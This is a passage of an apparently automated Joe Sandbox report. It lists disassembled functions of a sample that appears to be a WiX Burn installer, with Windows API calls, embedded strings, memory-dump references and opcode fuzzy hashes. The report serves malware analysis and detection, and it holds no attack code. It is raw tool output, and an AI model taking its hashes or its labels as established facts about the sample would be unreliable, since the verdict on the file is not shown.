                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1979452859-0
                                                                                                                                                                    • Opcode ID: 3c5984ac08117d0c6125a2343b9b57678446faf069e412507f28a96dd72335c4
                                                                                                                                                                    • Instruction ID: 70247cb1b8272e3771ec4f1f387fb52c8f931b20807e19ff80c9ab30a3f5fffb
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c5984ac08117d0c6125a2343b9b57678446faf069e412507f28a96dd72335c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11A03680062AEFCB22AEE48841EAEBB6CEF44320B124139FD0167313CB314E50D7D1
                                                                                                                                                                    Function 009034B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00918BD3,0000001C,80070490,00000000,00000000,80070490), ref: 009034D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                                                    • Opcode ID: c9054b364d2d0d4657cd5d0f985d4bced6c9adf7f3a4912a542438ec348868d1
                                                                                                                                                                    • Instruction ID: 400732f7e4d9a5e0a033edc44574e6effa32674286f83b6a9a68342013b49f51
                                                                                                                                                                    • Opcode Fuzzy Hash: c9054b364d2d0d4657cd5d0f985d4bced6c9adf7f3a4912a542438ec348868d1
                                                                                                                                                                    • Instruction Fuzzy Hash: C5E012723011287FE6022F629C05DAB7B5C9F463547008051BE40D6050D762D55096B0
                                                                                                                                                                    Function 00942EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,0090556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00942F0B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                    • Opcode ID: 037bcc91f1acb0aba7250c255d4e63858416682d402340b46fd7db470a6cebf7
                                                                                                                                                                    • Instruction ID: 91f7bed62492d85dedafe81996948a4470f458ac14328ce36ff8e7b31e0eabf7
                                                                                                                                                                    • Opcode Fuzzy Hash: 037bcc91f1acb0aba7250c255d4e63858416682d402340b46fd7db470a6cebf7
                                                                                                                                                                    • Instruction Fuzzy Hash: E0E0FEB293E679DE8B109F69FD54A427BB8B719B60344425FF805C2230E7F18481AFA0
                                                                                                                                                                    Function 00949684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094966B
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: e72580834cb86549794df86e2a687678b3e76cc3f90499ad6b4eb4391ac9f1bc
                                                                                                                                                                    • Instruction ID: a4d6f72b2998386c3271d9e09feda5bd14d1b864c85a5c5fd40a530e5f50ff58
                                                                                                                                                                    • Opcode Fuzzy Hash: e72580834cb86549794df86e2a687678b3e76cc3f90499ad6b4eb4391ac9f1bc
                                                                                                                                                                    • Instruction Fuzzy Hash: 49B012912783016C3A5492482F53D37014CC7C0B51331461EF000E1040E8440C060532
                                                                                                                                                                    Function 00949653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094966B
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: edc430f63569087ceddbe0e4f37e33b8fecd5f014c49b0ee7f280510deede217
                                                                                                                                                                    • Instruction ID: fce78d7b8876957f00acefbd888973b463fa8b619622180634719352f7219f37
                                                                                                                                                                    • Opcode Fuzzy Hash: edc430f63569087ceddbe0e4f37e33b8fecd5f014c49b0ee7f280510deede217
                                                                                                                                                                    • Instruction Fuzzy Hash: 66B012912782017C3B1452046D82C37010CC7C0B51331861EF000F0040E8400C050233
                                                                                                                                                                    Function 00949674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094966B
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: 8921c6e78b7b710a77c56e9d858f60ab46019755e778664c3799fed29aaefa2b
                                                                                                                                                                    • Instruction ID: ddafbdafd6d270c32d823829247f890121dfd4291d978ac42c079f93a1967184
                                                                                                                                                                    • Opcode Fuzzy Hash: 8921c6e78b7b710a77c56e9d858f60ab46019755e778664c3799fed29aaefa2b
                                                                                                                                                                    • Instruction Fuzzy Hash: D0B012912781026C365492081C03D37014CC3C0B11331C61EF400D1040E8401C090132
                                                                                                                                                                    Function 009014B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,009021A8,?,00000000,?,00000000,?,0090390C,00000000,?,00000104), ref: 009014E8
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3492610842-0
                                                                                                                                                                    • Opcode ID: 7b5034e93f5287c43924858c8f8005c821b91f1c55a0207dec7e6665017e1596
                                                                                                                                                                    • Instruction ID: 34d7c948e6939c6e4bb8d843b1540454af3d0c2d12a70e6e7d3a217e438899f5
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b5034e93f5287c43924858c8f8005c821b91f1c55a0207dec7e6665017e1596
                                                                                                                                                                    • Instruction Fuzzy Hash: FF01F937200219AFCF115E54DC80F9A77A9AF85754F118219FA165B1F1D6319C009A90

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 0090A8F1 Relevance: 172.2, APIs: 29, Strings: 69, Instructions: 688COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090B11C
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,0094CA9C,000000FF,DirectorySearch,000000FF,0094CA9C,Condition,feclient.dll,0094CA9C,Variable,?,0094CA9C,0094CA9C,?,?), ref: 0090AA29
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0090AA7E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0090AA9A
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0090AABE
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0090AB11
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0090AB2B
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0090AB53
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0090AB91
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0090ABB0
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0090ABCF
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0090AC8D
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0090ACA7
                                                                                                                                                                      • Part of subcall function 009432F3: VariantInit.OLEAUT32(?), ref: 00943309
                                                                                                                                                                      • Part of subcall function 009432F3: SysAllocString.OLEAUT32(?), ref: 00943325
                                                                                                                                                                      • Part of subcall function 009432F3: VariantClear.OLEAUT32(?), ref: 009433AC
                                                                                                                                                                      • Part of subcall function 009432F3: SysFreeString.OLEAUT32(00000000), ref: 009433B7
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0090AD06
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0090AD28
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0090AD48
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0090AE20
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090AFFE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                                                                    • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                                                                    • API String ID: 2748437055-56916464
                                                                                                                                                                    • Opcode ID: 99e3baa209f69a24561add080d514ebc366015978024778ab9b3462be3ca2139
                                                                                                                                                                    • Instruction ID: 8c884a5f624849e8d2a04d90181fd53891c3ed3981c0d3ef99b0d7580bda9db4
                                                                                                                                                                    • Opcode Fuzzy Hash: 99e3baa209f69a24561add080d514ebc366015978024778ab9b3462be3ca2139
                                                                                                                                                                    • Instruction Fuzzy Hash: F222D731E49226BEDB218AA48C42F6F7A79AF45738F204750F534B62D4DBB0AE40D7D1
                                                                                                                                                                    Function 009241EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to add patch properties to argument string., xrefs: 009244FD
                                                                                                                                                                    • REINSTALL=ALL, xrefs: 009245D3, 0092464D
                                                                                                                                                                    • Failed to initialize external UI handler., xrefs: 009243F4
                                                                                                                                                                    • Failed to add feature action properties to obfuscated argument string., xrefs: 009244DB
                                                                                                                                                                    • %ls %ls=ALL, xrefs: 009246B6, 00924795
                                                                                                                                                                    • Failed to run maintanance mode for MSI package., xrefs: 009246F6
                                                                                                                                                                    • Failed to add obfuscated properties to argument string., xrefs: 00924497
                                                                                                                                                                    • Failed to add reboot suppression property on uninstall., xrefs: 0092477D
                                                                                                                                                                    • Failed to add the list of dependencies to ignore to the properties., xrefs: 009246CA
                                                                                                                                                                    • Failed to get cached path for package: %ls, xrefs: 0092434F
                                                                                                                                                                    • Failed to add ADMIN property on admin install., xrefs: 0092471E
                                                                                                                                                                    • msasn1.dll, xrefs: 0092440B
                                                                                                                                                                    • Failed to add properties to argument string., xrefs: 00924463
                                                                                                                                                                    • REBOOT=ReallySuppress, xrefs: 009245A0, 0092476C
                                                                                                                                                                    • Failed to add reboot suppression property on install., xrefs: 009245BB
                                                                                                                                                                    • Failed to add reinstall all property on minor upgrade., xrefs: 009245EA
                                                                                                                                                                    • VersionString, xrefs: 0092428E, 009242EF
                                                                                                                                                                    • Failed to add patch properties to obfuscated argument string., xrefs: 0092451F
                                                                                                                                                                    • ACTION=ADMIN, xrefs: 00924709
                                                                                                                                                                    • Failed to uninstall MSI package., xrefs: 009247EF
                                                                                                                                                                    • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 009245F5
                                                                                                                                                                    • Failed to add feature action properties to argument string., xrefs: 009244B9
                                                                                                                                                                    • WixBundleExecutePackageCacheFolder, xrefs: 0092436A, 009248A4
                                                                                                                                                                    • crypt32.dll, xrefs: 0092440A
                                                                                                                                                                    • Failed to install MSI package., xrefs: 00924746
                                                                                                                                                                    • IGNOREDEPENDENCIES, xrefs: 009246A5, 00924784
                                                                                                                                                                    • WixBundleExecutePackageAction, xrefs: 009243B7, 009248B4
                                                                                                                                                                    • feclient.dll, xrefs: 009242C5, 0092434D, 0092441D, 0092454B, 009247D8
                                                                                                                                                                    • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0092460C
                                                                                                                                                                    • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00924687
                                                                                                                                                                    • Failed to build MSI path., xrefs: 0092439D
                                                                                                                                                                    • Failed to enable logging for package: %ls to: %ls, xrefs: 0092441F
                                                                                                                                                                    • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0092469B
                                                                                                                                                                    • Failed to perform minor upgrade of MSI package., xrefs: 00924638
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                                                                    • API String ID: 0-2033600224
                                                                                                                                                                    • Opcode ID: b9c6d5b483914bde3e17acf09611d961310d77016ab10072482a69b4deb7a770
                                                                                                                                                                    • Instruction ID: 5542b3570d141d8c00cc6bb60224782bccbeec420f822ff00d22075faaab02a6
                                                                                                                                                                    • Opcode Fuzzy Hash: b9c6d5b483914bde3e17acf09611d961310d77016ab10072482a69b4deb7a770
                                                                                                                                                                    • Instruction Fuzzy Hash: 4802CF71A00639AFCB21DF64DC41FA9B7AAFF84704F0101A5F908A7255D732AEA4CF80
                                                                                                                                                                    Function 00941719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 009417B1
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009417BB
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00941808
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0094180E
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00941848
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0094184E
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0094188E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941894
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 009418D4
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009418DA
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0094191A
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941920
                                                                                                                                                                    • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00941A11
                                                                                                                                                                    • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00941A4B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941A55
                                                                                                                                                                    • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00941A8D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941A97
                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00941AD0
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941ADA
                                                                                                                                                                    • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00941B18
                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00941B2E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                    • String ID: srputil.cpp
                                                                                                                                                                    • API String ID: 267631441-4105181634
                                                                                                                                                                    • Opcode ID: d4d4210259b0b83d714d3c9b9eadf7a23e1edb5d02e66fcf51f61170ca486cbf
                                                                                                                                                                    • Instruction ID: 343482129054bbd06e3e9f949337f7c0539b6470334358300acb12214bec943d
                                                                                                                                                                    • Opcode Fuzzy Hash: d4d4210259b0b83d714d3c9b9eadf7a23e1edb5d02e66fcf51f61170ca486cbf
